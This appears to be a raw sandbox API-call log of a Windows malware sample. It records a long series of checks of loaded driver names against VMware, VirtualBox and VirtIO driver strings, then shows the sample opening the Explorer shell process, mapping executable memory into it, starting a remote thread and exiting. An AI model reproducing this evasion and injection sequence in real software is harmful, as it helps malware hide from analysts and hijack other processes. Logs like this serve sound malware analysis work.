[0217.290] strstr (_Str="ksecdd.sys", _SubStr="vioser") returned 0x0 [0217.290] strstr (_Str="clipsp.sys", _SubStr="vmci.s") returned 0x0 [0217.290] strstr (_Str="clipsp.sys", _SubStr="vmusbm") returned 0x0 [0217.290] strstr (_Str="clipsp.sys", _SubStr="vmmous") returned 0x0 [0217.290] strstr (_Str="clipsp.sys", _SubStr="vm3dmp") returned 0x0 [0217.290] strstr (_Str="clipsp.sys", _SubStr="vmrawd") returned 0x0 [0217.290] strstr (_Str="clipsp.sys", _SubStr="vmmemc") returned 0x0 [0217.290] strstr (_Str="clipsp.sys", _SubStr="vboxgu") returned 0x0 [0217.290] strstr (_Str="clipsp.sys", _SubStr="vboxsf") returned 0x0 [0217.290] strstr (_Str="clipsp.sys", _SubStr="vboxmo") returned 0x0 [0217.290] strstr (_Str="clipsp.sys", _SubStr="vboxvi") returned 0x0 [0217.290] strstr (_Str="clipsp.sys", _SubStr="vboxdi") returned 0x0 [0217.291] strstr (_Str="clipsp.sys", _SubStr="vioser") returned 0x0 [0217.291] strstr (_Str="wdf01000.sys", _SubStr="vmci.s") returned 0x0 [0217.291] strstr (_Str="wdf01000.sys", _SubStr="vmusbm") returned 0x0 [0217.291] strstr (_Str="wdf01000.sys", _SubStr="vmmous") returned 0x0 [0217.291] strstr (_Str="wdf01000.sys", _SubStr="vm3dmp") returned 0x0 [0217.291] strstr (_Str="wdf01000.sys", _SubStr="vmrawd") returned 0x0 [0217.291] strstr (_Str="wdf01000.sys", _SubStr="vmmemc") returned 0x0 [0217.291] strstr (_Str="wdf01000.sys", _SubStr="vboxgu") returned 0x0 [0217.291] strstr (_Str="wdf01000.sys", _SubStr="vboxsf") returned 0x0 [0217.291] strstr (_Str="wdf01000.sys", _SubStr="vboxmo") returned 0x0 [0217.291] strstr (_Str="wdf01000.sys", _SubStr="vboxvi") returned 0x0 [0217.291] strstr (_Str="wdf01000.sys", _SubStr="vboxdi") returned 0x0 [0217.291] strstr (_Str="wdf01000.sys", _SubStr="vioser") returned 0x0 [0217.291] strstr (_Str="wdfldr.sys", _SubStr="vmci.s") returned 0x0 [0217.291] strstr (_Str="wdfldr.sys", _SubStr="vmusbm") returned 0x0 [0217.291] strstr (_Str="wdfldr.sys", _SubStr="vmmous") returned 0x0 [0217.291] strstr (_Str="wdfldr.sys", _SubStr="vm3dmp") returned 0x0 [0217.291] strstr (_Str="wdfldr.sys", _SubStr="vmrawd") returned 0x0 [0217.291] strstr (_Str="wdfldr.sys", _SubStr="vmmemc") returned 0x0 [0217.291] strstr (_Str="wdfldr.sys", _SubStr="vboxgu") returned 0x0 [0217.292] strstr (_Str="wdfldr.sys", _SubStr="vboxsf") returned 0x0 [0217.292] strstr (_Str="wdfldr.sys", _SubStr="vboxmo") returned 0x0 [0217.292] strstr (_Str="wdfldr.sys", _SubStr="vboxvi") returned 0x0 [0217.292] strstr (_Str="wdfldr.sys", _SubStr="vboxdi") returned 0x0 [0217.292] strstr (_Str="wdfldr.sys", _SubStr="vioser") returned 0x0 [0217.292] strstr (_Str="acpiex.sys", _SubStr="vmci.s") returned 0x0 [0217.292] strstr (_Str="acpiex.sys", _SubStr="vmusbm") returned 0x0 [0217.292] strstr (_Str="acpiex.sys", _SubStr="vmmous") returned 0x0 [0217.292] strstr (_Str="acpiex.sys", _SubStr="vm3dmp") returned 0x0 [0217.292] strstr (_Str="acpiex.sys", _SubStr="vmrawd") returned 0x0 [0217.292] strstr (_Str="acpiex.sys", _SubStr="vmmemc") returned 0x0 [0217.292] strstr (_Str="acpiex.sys", _SubStr="vboxgu") returned 0x0 [0217.292] strstr (_Str="acpiex.sys", _SubStr="vboxsf") returned 0x0 [0217.292] strstr (_Str="acpiex.sys", _SubStr="vboxmo") returned 0x0 [0217.292] strstr (_Str="acpiex.sys", _SubStr="vboxvi") returned 0x0 [0217.292] strstr (_Str="acpiex.sys", _SubStr="vboxdi") returned 0x0 [0217.292] strstr (_Str="acpiex.sys", _SubStr="vioser") returned 0x0 [0217.293] strstr (_Str="wpprecorder.sys", _SubStr="vmci.s") returned 0x0 [0217.293] strstr (_Str="wpprecorder.sys", _SubStr="vmusbm") returned 0x0 [0217.293] strstr (_Str="wpprecorder.sys", _SubStr="vmmous") returned 0x0 [0217.293] strstr (_Str="wpprecorder.sys", _SubStr="vm3dmp") returned 0x0 [0217.293] strstr (_Str="wpprecorder.sys", _SubStr="vmrawd") returned 0x0 [0217.293] strstr (_Str="wpprecorder.sys", _SubStr="vmmemc") returned 0x0 [0217.293] strstr (_Str="wpprecorder.sys", _SubStr="vboxgu") returned 0x0 [0217.293] strstr (_Str="wpprecorder.sys", _SubStr="vboxsf") returned 0x0 [0221.993] strstr (_Str="wpprecorder.sys", _SubStr="vboxmo") returned 0x0 [0221.995] strstr (_Str="wpprecorder.sys", _SubStr="vboxvi") returned 0x0 [0221.995] strstr (_Str="wpprecorder.sys", _SubStr="vboxdi") returned 0x0 [0221.995] strstr (_Str="wpprecorder.sys", _SubStr="vioser") returned 0x0 [0227.387] strstr (_Str="cng.sys", _SubStr="vmci.s") returned 0x0 [0227.388] strstr (_Str="cng.sys", _SubStr="vmusbm") returned 0x0 [0227.388] strstr (_Str="cng.sys", _SubStr="vmmous") returned 0x0 [0227.388] strstr (_Str="cng.sys", _SubStr="vm3dmp") returned 0x0 [0227.388] strstr (_Str="cng.sys", _SubStr="vmrawd") returned 0x0 [0227.388] strstr (_Str="cng.sys", _SubStr="vmmemc") returned 0x0 [0227.388] strstr (_Str="cng.sys", _SubStr="vboxgu") returned 0x0 [0227.388] strstr (_Str="cng.sys", _SubStr="vboxsf") returned 0x0 [0227.388] strstr (_Str="cng.sys", _SubStr="vboxmo") returned 0x0 [0227.388] strstr (_Str="cng.sys", _SubStr="vboxvi") returned 0x0 [0227.388] strstr (_Str="cng.sys", _SubStr="vboxdi") returned 0x0 [0227.388] strstr (_Str="cng.sys", _SubStr="vioser") returned 0x0 [0227.388] strstr (_Str="acpi.sys", _SubStr="vmci.s") returned 0x0 [0227.388] strstr (_Str="acpi.sys", _SubStr="vmusbm") returned 0x0 [0227.389] strstr (_Str="acpi.sys", _SubStr="vmmous") returned 0x0 [0227.389] strstr (_Str="acpi.sys", _SubStr="vm3dmp") returned 0x0 [0227.389] strstr (_Str="acpi.sys", _SubStr="vmrawd") returned 0x0 [0227.389] strstr (_Str="acpi.sys", _SubStr="vmmemc") returned 0x0 [0227.389] strstr (_Str="acpi.sys", _SubStr="vboxgu") returned 0x0 [0227.389] strstr (_Str="acpi.sys", _SubStr="vboxsf") returned 0x0 [0227.389] strstr (_Str="acpi.sys", _SubStr="vboxmo") returned 0x0 [0227.389] strstr (_Str="acpi.sys", _SubStr="vboxvi") returned 0x0 [0227.389] strstr (_Str="acpi.sys", _SubStr="vboxdi") returned 0x0 [0227.389] strstr (_Str="acpi.sys", _SubStr="vioser") returned 0x0 [0227.389] strstr (_Str="wmilib.sys", _SubStr="vmci.s") returned 0x0 [0227.389] strstr (_Str="wmilib.sys", _SubStr="vmusbm") returned 0x0 [0227.389] strstr (_Str="wmilib.sys", _SubStr="vmmous") returned 0x0 [0227.389] strstr (_Str="wmilib.sys", _SubStr="vm3dmp") returned 0x0 [0227.389] strstr (_Str="wmilib.sys", _SubStr="vmrawd") returned 0x0 [0227.389] strstr (_Str="wmilib.sys", _SubStr="vmmemc") returned 0x0 [0227.389] strstr (_Str="wmilib.sys", _SubStr="vboxgu") returned 0x0 [0227.389] strstr (_Str="wmilib.sys", _SubStr="vboxsf") returned 0x0 [0227.389] strstr (_Str="wmilib.sys", _SubStr="vboxmo") returned 0x0 [0227.389] strstr (_Str="wmilib.sys", _SubStr="vboxvi") returned 0x0 [0227.389] strstr (_Str="wmilib.sys", _SubStr="vboxdi") returned 0x0 [0227.389] strstr (_Str="wmilib.sys", _SubStr="vioser") returned 0x0 [0227.392] LocalFree (hMem=0x1ed2050) returned 0x0 [0227.392] Sleep (dwMilliseconds=0x1388) [0232.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ff1c*=0x0, ZeroBits=0x0, RegionSize=0x19ff24*=0x5200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19ff1c*=0x4e0000, RegionSize=0x19ff24*=0x6000) returned 0x0 [0232.407] GetShellWindow () returned 0x100de [0232.407] GetWindowThreadProcessId (in: hWnd=0x100de, lpdwProcessId=0x19fec8 | out: lpdwProcessId=0x19fec8) returned 0x7b8 [0232.408] NtOpenProcess (in: ProcessHandle=0x19ff18, DesiredAccess=0x40, ObjectAttributes=0x19ff00*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19fef8*(UniqueProcess=0x7b4, UniqueThread=0x0) | out: ProcessHandle=0x19ff18*=0x15c) returned 0x0 [0232.408] NtDuplicateObject (in: SourceProcessHandle=0x15c, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x19ff1c, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x19ff1c*=0x160) returned 0x0 [0232.408] NtCreateSection (in: SectionHandle=0x19fed4, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed4*=0x164) returned 0x0 [0232.408] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0xffffffff, BaseAddress=0x19fee4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee4*=0x4f0000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0232.409] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0x160, BaseAddress=0x19feec*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19feec*=0x2360000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0232.410] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f0000, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0x2d [0232.410] NtCreateSection (in: SectionHandle=0x19fed0, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed0*=0x168) returned 0x0 [0232.410] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0xffffffff, BaseAddress=0x19fee0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x15200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee0*=0x500000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0232.411] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0x160, BaseAddress=0x19fee8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x19fee8*=0x2460000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0232.415] RtlCreateUserThread (in: ProcessHandle=0x160, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x2461930, Parameter=0x2360000, ThreadHandle=0x19fe30*=0x5a01ed2048, ClientId=0x0 | out: ThreadHandle=0x19fe30*=0x16c, ClientId=0x0) returned 0x0 [0232.418] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Thread: id = 170 os_tid = 0x4c4